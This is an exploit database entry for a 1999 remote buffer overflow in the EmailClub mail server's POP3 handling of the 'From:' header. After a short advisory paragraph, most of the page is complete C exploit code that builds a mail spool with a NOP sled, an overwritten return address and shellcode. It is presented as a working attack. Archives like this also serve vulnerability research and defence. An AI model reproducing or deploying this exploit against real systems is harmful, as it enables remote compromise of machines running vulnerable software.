Admiral Systems EmailClub 1.0.0.5 - Remote Buffer Overflow

EDB-ID:

19621

CVE:

1999-1190

EDB Verified:

Author:

UNYUN

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

1999-11-15

Vulnerable App: 
// source: https://www.securityfocus.com/bid/801/info


Certain versions of EmailClub, a mail server package by Admiral Systems Inc. are vulnerable to a remote buffer overflow. This overflow is exploitable via EmailClub's POP3 server which fails to perform proper bounds checking on the 'From:' header on incoming e-mail.

This overflow will lead to a complete compromise of the Windows 95/98 target machine. It may well also affect Windows NT installations in the same manner. It is unclear though if EmailClub run with ADMIN privileges under Windows NT installations.


/*=========================================================================
   E-MailClub Ver1.0.0.5 for Windows98J exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =========================================================================
*/
#include <stdio.h>
#include <string.h>

#define HD1 \
"From exploit Wed Oct 27 01:53 JST 1999\n"\
"Date: Wed, 27 Oct 1999 01:53:00 +0900\n"

#define HD2 \
"Message-Id: <3815C9EBDC.E749HOGE@192.168.0.1>\n"\
"MIME-Version: 1.0\n"\
"Content-Transfer-Encoding: 7bit\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 1\n"\
"Status: U\n\n\n\n"

#define MAXBUF      2000
#define MAXBUF2     500
#define NOP         0x90
#define RETADR      511
#define EIP         0x7fc1415b

unsigned char exploit_code[100]={
0xb8,0x55,0x55,0x55,
0x55,0x50,0x50,0xB8,
0x96,0x91,0xFA,0x5F,
0x03,0xC0,0x50,0xc3,
};

main(int argc, char *argv[])
{
    FILE            *fp;
    char            buf[MAXBUF];
    unsigned int    ip;

    if (argc!=2){
        printf("usage: %s mailspool\n",argv[0]);
        exit(1);
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write to %s\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,MAXBUF);
    buf[MAXBUF-1]=0;

    ip=EIP;
    buf[RETADR-1]=0xa0;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    strncpy(buf+RETADR+40,exploit_code,strlen(exploit_code));

    fprintf(fp,"%s",HD1);
    fprintf(fp,"From: %s <exploit@sample.code.net>\n",buf);
    fprintf(fp,"To: you@your.host.net\n");
    fprintf(fp,"Subject: subscribe exploit\n");
    fprintf(fp,"%s",HD2);
    fclose(fp);
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services